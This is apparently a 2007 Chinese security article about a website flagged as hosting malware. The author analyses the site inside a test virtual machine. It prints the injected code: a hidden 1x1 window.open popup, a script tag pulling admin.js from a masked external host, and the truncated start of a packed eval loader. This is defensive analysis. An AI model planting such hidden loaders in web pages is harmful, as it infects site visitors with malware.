一,、陷入毒窝
我们在Google中搜索资料的时候,经常会看到这样的搜索结果“该网站可能含有恶意软件,有可能会危害您的电脑。”或者“继续访问 http://www.*.com,但风险自担。”这是Google以自己的方式对网页安全性分析的结果。我们没有理由怀疑Google的技术,这是它在以自己的方式告诉我们“这是个毒窝”。以“不入虎穴,焉得虎子”的英勇,我们就去探探虎穴。
测试环境说明:一安装有Windows XP的虚拟机,没有打补丁包,没有安装杀毒软件和防火墙。
1.探毒
第一步:下载网页
(为了不至于“出师未捷,而光荣牺牲。”我先把挂马的网页下载下来。看看到底用了什么网马,怎么挂的?)用迅雷很快地把挂了马的网页下载下来。
第二步:分析网页代码
用记事本打开网页查看源代码,通过分析,发现挂马者在该网站的首页的开头和尾部都加入了如下的代码:
<SCRIPT language=javascript>
window.open ("http://www.*.com/1.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script>
这是一个用javascript脚本木马的代码,其中的http://www.*.com/1.htm应该是网页木马的地址。
第三步:继续用迅雷下载http://www.*.com/1.htm,用记事本打开,代码如下:
<script language=javascript src="http://my.*.com/admin.js>"; </script>
这是一个木马脚本,通过脚本调用了一个js文件。
第四步:用迅雷下载admin.js文件,用记事本打开,部分代码如下:
eval(function(p,a,c,k,e,d){e=function(c){return(c
http://net.zdnet.com.cn/network_security_zone/2007/1225/690486.shtml